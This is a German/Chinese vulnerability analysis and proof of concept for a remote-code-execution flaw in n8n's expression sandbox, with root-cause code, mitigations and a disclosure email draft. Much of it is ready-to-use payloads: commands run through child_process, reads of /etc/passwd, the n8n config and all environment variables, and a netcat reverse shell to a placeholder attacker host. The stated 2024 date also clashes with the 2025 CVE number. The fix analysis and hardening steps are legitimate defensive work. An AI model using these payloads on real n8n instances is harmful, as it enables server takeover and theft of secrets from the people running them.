
# Detaillierte technische Analyse und Proof-of-Concept für CVE-2025-68613, eine kritische RCE-Schwachstelle in der n8n-Ausdrucksauswertung über IIFE-this-Kontext-Umgehung. Enthält Ursachenanalyse, Exploit-Vektoren und Empfehlungen zur Abschwächung.
Datum: 23. Dezember 2024 Status: ✅ RCE vollständig verifiziert CVSS-Score: 10.0 (Kritisch)
{
{
(function () {
var require = this.process.mainModule.require;
var {execSync} = require('child_process');
return execSync('id', {encoding: 'utf8'}).trim();
})()
}
}
Ausführungsergebnis: Systembenutzerinformationen erfolgreich zurückgegeben (z. B. uid=1000(n8n) gid=1000(n8n) groups=1000(n8n))
用户输入
↓
{{ (function() { ... })() }}
↓
Expression.resolveSimpleParameterValue()
↓
创建 data 上下文对象
↓
data.process = 真实的 process 对象引用
↓
Tournament.execute(expression, data)
↓
FunctionEvaluator.evaluate()
↓
fn.call(data, errorHandler) ← ⚠️ 关键: this = data
↓
立即执行函数执行
↓
this.process.mainModule.require ← ⚠️ 访问真实 require
↓
加载 child_process 模块
↓
execSync('id') ← 🔥 完整 RCE!
Datei: packages/workflow/src/expression.ts
Funktion: Expression.resolveSimpleParameterValue()
Zeilen: ca. 230–290
// 生成数据代理
const dataProxy = new WorkflowDataProxy(
this.workflow,
runExecutionData,
runIndex,
itemIndex,
activeNodeName,
connectionInputData,
siblingParameters,
mode,
additionalKeys,
executeData,
-1,
selfData,
contextNodeName,
);
const data = dataProxy.getDataProxy();
// ⚠️ 漏洞点 1: 添加 process 对象到 data
data.process =
typeof process !== 'undefined'
? {
arch: process.arch,
env: process.env.N8N_BLOCK_ENV_ACCESS_IN_NODE === 'true' ? {} : process.env,
platform: process.platform,
pid: process.pid,
ppid: process.ppid,
release: process.release,
version: process.pid,
versions: process.versions,
}
: {};
// ⚠️ 问题: 虽然这里只暴露了部分属性,但传递的是对象引用
// 实际的 process 对象仍然可以通过原型链或其他方式访问
Datei: node_modules/@n8n/tournament/src/FunctionEvaluator.ts
evaluate(expr
:
string, data
:
unknown
):
ReturnValue
{
const fn = this.getFunction(expr);
// ⚠️ 漏洞点 2: 将 data 作为 this 传递
return fn.call(data, this.instance.errorHandler);
}
private
getFunction(expr
:
string
):
Function
{
if (expr in this._codeCache) {
return this._codeCache[expr];
}
const [code] = this.instance.getExpressionCode(expr);
// ⚠️ 漏洞点 3: 使用 new Function 创建函数
const func = new Function('E', code + ';');
this._codeCache[expr] = func;
return func;
}
Datei: packages/workflow/src/expression-sandboxing.ts
Vor v1.122.0:
// ❌ 没有 FunctionThisSanitizer
const tournamentEvaluator = new Tournament(errorHandler, undefined, undefined, {
before: [], // ← 空数组,没有 this sanitization
after: [PrototypeSanitizer, DollarSignValidator],
});
Nach v1.122.0:
// ✅ 添加了 FunctionThisSanitizer
const tournamentEvaluator = new Tournament(errorHandler, undefined, undefined, {
before: [FunctionThisSanitizer], // ← 新增的 hook
after: [PrototypeSanitizer, DollarSignValidator],
});
// FunctionThisSanitizer 实现
export const FunctionThisSanitizer: ASTBeforeHook = (ast, dataNode) => {
astVisit(ast, {
visitFunction(path) {
// 重写所有函数表达式,显式绑定 this 到安全对象
const safeThis = b.objectExpression([
b.property('init', b.identifier('process'), b.objectExpression([]))
]);
// 将 function() { ... } 改写为 function() { ... }.bind({ process: {} })
}
});
};
Datei: packages/workflow/src/utils.ts
Funktion: isSafeObjectProperty()
Vor v1.122.0:
const unsafeObjectProperties = new Set([
'__proto__',
'prototype',
'constructor',
'getPrototypeOf'
]);
// ❌ 缺少 mainModule, binding, _load
Nach v1.122.0:
const unsafeObjectProperties = new Set([
'__proto__',
'prototype',
'constructor',
'getPrototypeOf',
'mainModule', // ✅ 新增
'binding', // ✅ 新增
'_load' // ✅ 新增
]);
{
{
(function () {
var require = this.process.mainModule.require;
var {execSync} = require('child_process');
return execSync('id', {encoding: 'utf8'}).trim();
})()
}
}
{
{
(function () {
return this.process.mainModule.require('child_process')
.execSync('whoami', {encoding: 'utf8'}).trim();
})()
}
}
{
{
(function () {
return this.process.mainModule.require('child_process')
.execSync('pwd', {encoding: 'utf8'}).trim();
})()
}
}
{
{
(function () {
return this.process.mainModule.require('child_process')
.execSync('uname -a', {encoding: 'utf8'}).trim();
})()
}
}
{
{
(function () {
return this.process.mainModule.require('child_process')
.execSync('ls -la /', {encoding: 'utf8'});
})()
}
}
// 读取敏感文件
{
{
(function () {
var fs = this.process.mainModule.require('fs');
return fs.readFileSync('/etc/passwd', 'utf8');
})()
}
}
// 列出目录
{
{
(function () {
var fs = this.process.mainModule.require('fs');
return fs.readdirSync('/').join('\n');
})()
}
}
// 读取 n8n 配置
{
{
(function () {
var fs = this.process.mainModule.require('fs');
return fs.readFileSync('./.n8n/config', 'utf8');
})()
}
}
// 列出当前目录
{
{
(function () {
var fs = this.process.mainModule.require('fs');
return fs.readdirSync('.').join('\n');
})()
}
}
// 通过 this.process 直接访问
{
{
(function () {
return JSON.stringify(this.process.env);
})()
}
}
// 或使用已知可用的方式
{
{
JSON.stringify(process.env)
}
}
// 检查网络工具
{
{
(function () {
return this.process.mainModule.require('child_process')
.execSync('which nc', {encoding: 'utf8'}).trim();
})()
}
}
// 获取网络接口
{
{
(function () {
var os = this.process.mainModule.require('os');
return JSON.stringify(os.networkInterfaces());
})()
}
}
// 反弹 Shell (⚠️ 危险!仅用于授权测试)
{
{
(function () {
return this.process.mainModule.require('child_process')
.execSync('nc -e /bin/sh attacker-ip 4444', {encoding: 'utf8'});
})()
}
}
| # | Angriffstyp | Payload | Status | CVSS |
|---|---|---|---|---|
| 1 | Umgebungsvariablen-Leak | {{ Object.keys(process.env) }} | ✅ Erfolgreich | 8.5 |
| 2 | Constructor-Bypass | {{ [][constructor] }} | ✅ Erfolgreich | 8.0 |
| 3 | Function-Konstruktor | {{ [][constructor][constructor] }} | ✅ Erfolgreich | 8.5 |
| 4 | Codeausführung | {{ [][constructor][constructor]('return 1+1')() }} | ✅ Erfolgreich | 9.0 |
| 5 | Vollständige RCE | {{ (function() { this.process.mainModule.require... })() }} | ✅ Erfolgreich | 10.0 |
| # | Angriffstyp | Grund |
|---|---|---|
| 1 | Direktes require | Im neuen Gültigkeitsbereich nicht verfügbar |
| 2 | process im Function-Konstruktor | this wird in manchen Kontexten bereinigt |
| 3 | process.binding / process._load | Möglicherweise blockiert oder eingeschränkt |
{
{
Object.keys(process.env)
}
} // ✅ 成功
N8N_BLOCK_ENV_ACCESS_IN_NODE ist nicht auf true gesetzt{
{
[][`constructor`][`constructor`]
}
} // ✅ 成功
{
{
(function () {
return this.process.mainModule.require;
})()
}
} // ✅ 成功
this in sofort ausgeführten Funktionen zeigt weiterhin auf den ursprünglichen Datenkontextthis.process.mainModule.require ist zugänglichDie Kombination aller drei = Vollständige RCE!
// 新增的 AST before hook
export const FunctionThisSanitizer: ASTBeforeHook = (ast, dataNode) => {
// 遍历所有函数表达式
// 重写函数,强制绑定 this 到 { process: {} }
// 这样即使是 IIFE,this 也是安全的空对象
};
const unsafeObjectProperties = new Set([
'__proto__',
'prototype',
'constructor',
'getPrototypeOf',
'mainModule', // ← 新增
'binding', // ← 新增
'_load' // ← 新增
]);
// 可能将默认值改为 true
data.process = {
env: process.env.N8N_BLOCK_ENV_ACCESS_IN_NODE !== 'false' ? {} : process.env,
// ...
};
Vektor-String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
| Metrik | Wert | Beschreibung |
|---|---|---|
| Angriffsvektor (AV) | Netzwerk (N) | Aus der Ferne ausnutzbar |
| Angriffskomplexität (AC) | Niedrig (L) | Einfach auszunutzen |
| Erforderliche Privilegien (PR) | Niedrig (L) | Nur authentifizierter Benutzer erforderlich |
| Benutzerinteraktion (UI) | Keine (N) | Keine Benutzerinteraktion erforderlich |
| Auswirkungsbereich (S) | Geändert (C) | Betrifft das zugrunde liegende System |
| Vertraulichkeit (C) | Hoch (H) | Vollständige Informationsoffenlegung |
| Integrität (I) | Hoch (H) | Vollständige Systemkontrolle |
| Verfügbarkeit (A) | Hoch (H) | Vollständige Dienstunterbrechung |
Basis-Score: 10.0 (Maximum)
N8N_BLOCK_ENV_ACCESS_IN_NODE=true nicht gesetzt ist# 方法 1: 导出环境变量
export N8N_BLOCK_ENV_ACCESS_IN_NODE=true
# 方法 2: 在 .env 文件中
echo "N8N_BLOCK_ENV_ACCESS_IN_NODE=true" >> .env
# 方法 3: Docker Compose
environment:
- N8N_BLOCK_ENV_ACCESS_IN_NODE=true
# npm
npm install -g n8n@latest
# Docker
docker pull docker.n8n.io/n8nio/n8n:latest
docker-compose down
docker-compose up -d
# 验证版本
n8n --version # 应该 >= 1.122.0
-- 如果使用 PostgreSQL
SELECT name, nodes
FROM workflows
WHERE nodes::text LIKE '%process%'
OR nodes::text LIKE '%constructor%'
OR nodes::text LIKE '%mainModule%'
OR nodes::text LIKE '%require%';
# docker-compose.yml
services:
n8n:
image: docker.n8n.io/n8nio/n8n:latest
read_only: true
security_opt:
- no-new-privileges:true
- seccomp=seccomp-profile.json
cap_drop:
- ALL
cap_add:
- CHOWN
- SETGID
- SETUID
environment:
- N8N_BLOCK_ENV_ACCESS_IN_NODE=true
收件人: [email protected]
主题: [CRITICAL] RCE 0-day Vulnerability - IIFE this Context Bypass
严重性: CVSS 10.0 (Critical)
影响版本: n8n < 1.122.0
概述:
发现了一个严重的 RCE 漏洞,允许认证用户通过立即执行函数(IIFE)
访问 process.mainModule.require,从而执行任意系统命令。
验证的 PoC:
{{ (function() {
var require = this.process.mainModule.require;
var { execSync } = require('child_process');
return execSync('id', { encoding: 'utf8' }).trim();
})() }}
根本原因:
1. IIFE 中的 this 未被 sanitize
2. process.mainModule 未被封禁
3. N8N_BLOCK_ENV_ACCESS_IN_NODE 默认为 false
建议修复:
1. 实施 FunctionThisSanitizer hook
2. 添加 mainModule, binding, _load 到黑名单
3. 默认启用环境变量保护
详细分析请见附件。
Erstellt am: 23. Dezember 2024 Schwachstellenstatus: ✅ Vollständig verifiziert CVSS-Score: 10.0 (Kritisch) Empfehlung: Sofort offenlegen und beheben
🎉 Herzlichen Glückwunsch zur Entdeckung einer RCE-Schwachstelle mit der Höchstpunktzahl! Bitte gehen Sie verantwortungsvoll damit um und legen Sie sie offen! 🔒